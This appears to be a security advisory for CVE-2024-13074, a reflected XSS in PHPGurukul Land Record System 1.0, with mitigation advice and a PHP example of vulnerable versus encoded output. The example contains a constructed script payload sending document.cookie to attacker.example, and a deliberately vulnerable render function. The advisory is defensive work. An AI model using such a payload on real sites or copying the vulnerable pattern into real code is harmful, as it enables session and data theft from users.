Platform: php
Component: land-record-system
Fixed in: 1.0.1
CVE-2024-13074 is a cross-site scripting (XSS) vulnerability, classified as problematic, in PHPGurukul Land Record System version 1.0. The 'searchdata' parameter of /index.php is written back into the page without adequate output encoding, so an attacker can inject script that runs in a victim's browser and use it for data theft or session hijacking. Version 1.0 is affected; version 1.0.1 resolves the issue, and users are strongly encouraged to upgrade.
The flaw lets an attacker place arbitrary JavaScript in the value of 'searchdata'; when a victim loads a page that reflects that value, the script executes in the victim's browser with the origin and privileges of the Land Record System. From there it can read anything the page can read, including form data and personal information shown in the application, and send it to a server the attacker controls. It can also act on the victim's behalf by issuing requests to the application from inside the victim's authenticated session, which does not depend on reading the session cookie. Outright cookie theft is only possible if the session cookie is not flagged HttpOnly. Because the application manages land ownership records, a successful attack may expose or alter confidential information.
The vulnerability has been publicly disclosed, which raises the likelihood of exploitation. The CVSS rating is LOW, but the input is easy to reach and the data the application handles is sensitive, so it warrants prompt attention. No active campaigns or public proof-of-concept exploits had been reported as of the publication date; the public disclosure nonetheless makes the application a target. The vulnerability was published on 2024-12-31.
Exploit Status
EPSS: 0.13% (32nd percentile)
The primary mitigation for CVE-2024-13074 is to upgrade to version 1.0.1 of the Land Record System, which fixes the XSS. If upgrading immediately is not possible, apply output encoding to the 'searchdata' parameter wherever /index.php renders it (htmlspecialchars with ENT_QUOTES for an HTML body or attribute context), and add input validation as a second layer, for example a length limit and rejection of control characters. Encoding at the point of output is the control that actually prevents XSS; validation narrows the attack surface but does not replace it. A web application firewall (WAF) configured to block common XSS payloads can buy time but is bypassable and should be treated as a temporary measure. Review the application's other user-controlled inputs for the same pattern, since a fix limited to one parameter leaves similar bugs in place.
Update to a patched version, or apply the measures above so that injected markup cannot execute as script. Validate and encode user input, in particular the 'searchdata' parameter, before displaying it on the page.
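The following is an added example, not code from PHPGurukul or the Land Record System, showing the class of bug described above and its hardened form in PHP. The function names, the HTML fragment they build and the constructed payload are assumptions for illustration; the real /index.php is not reproduced here. It requires PHP 8 for str_contains.

```php
<?php
// Added illustration of CVE-2024-13074's bug class; not the project's own code.
// Assumed: a search form on index.php that echoes $_GET['searchdata'] back into
// the page. Names and markup are hypothetical.
declare(strict_types=1);

// Vulnerable pattern: the raw parameter is concatenated into HTML. A value like
// "><script>...</script> closes the attribute and the script runs in the
// victim's browser under the application's origin.
function render_search_vulnerable(string $searchdata): string
{
    return '<input type="text" name="searchdata" value="' . $searchdata . '">'
         . '<p>Results for: ' . $searchdata . '</p>';
}

// Output encoding for an HTML body or attribute context.
// ENT_QUOTES encodes both " and ' so attribute values cannot be closed early;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string;
// the explicit charset avoids any default-charset ambiguity.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Second layer: bound the length and reject control characters. This narrows
// what reaches the page but is not what stops the XSS; the encoding in h() is.
function validate_search_term(string $searchdata): string
{
    if (strlen($searchdata) > 100 || preg_match('/[\x00-\x1F\x7F]/', $searchdata) === 1) {
        return '';
    }
    return $searchdata;
}

// Hardened pattern: validate on input, encode on output, same markup as before.
function render_search_hardened(string $searchdata): string
{
    $term = validate_search_term($searchdata);
    return '<input type="text" name="searchdata" value="' . h($term) . '">'
         . '<p>Results for: ' . h($term) . '</p>';
}

// Constructed payload of the kind an attacker would place in ?searchdata=...
// It breaks out of the value attribute and exfiltrates document.cookie.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

$vuln = render_search_vulnerable($payload);
$safe = render_search_hardened($payload);

echo "vulnerable: $vuln\n";
echo "hardened:   $safe\n";

// Check: the vulnerable output carries a live <script> tag; the hardened output
// carries only the encoded form, so the browser renders it as text.
if (!str_contains($vuln, '<script>')) {
    fwrite(STDERR, "unexpected: vulnerable render did not reflect the payload\n");
    exit(1);
}
if (str_contains($safe, '<script') || !str_contains($safe, '&lt;script&gt;')) {
    fwrite(STDERR, "hardened render still contains raw markup\n");
    exit(1);
}
echo "ok: payload neutralised by output encoding\n";
```

Run it with `php example.php`. The point of the two render functions side by side is that the markup is identical; only the encoding at the output boundary differs. If the value is ever placed in a different context (inside a script block, a URL, or an event handler attribute), htmlspecialchars is not the right encoder and a context-specific one is needed.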
CVE-2024-13074 is a cross-site scripting (XSS) vulnerability in PHPGurukul Land Record System version 1.0 that allows attackers to inject malicious scripts via the 'searchdata' parameter of /index.php.
You are affected if you are using PHPGurukul Land Record System version 1.0. Upgrade to version 1.0.1 to resolve the vulnerability.
Upgrade to version 1.0.1. As a temporary measure, implement input validation and output encoding on the 'searchdata' parameter.
While no active campaigns are confirmed, the vulnerability has been publicly disclosed, increasing the risk of exploitation.
Refer to the PHPGurukul website or security advisories for the official advisory regarding CVE-2024-13074.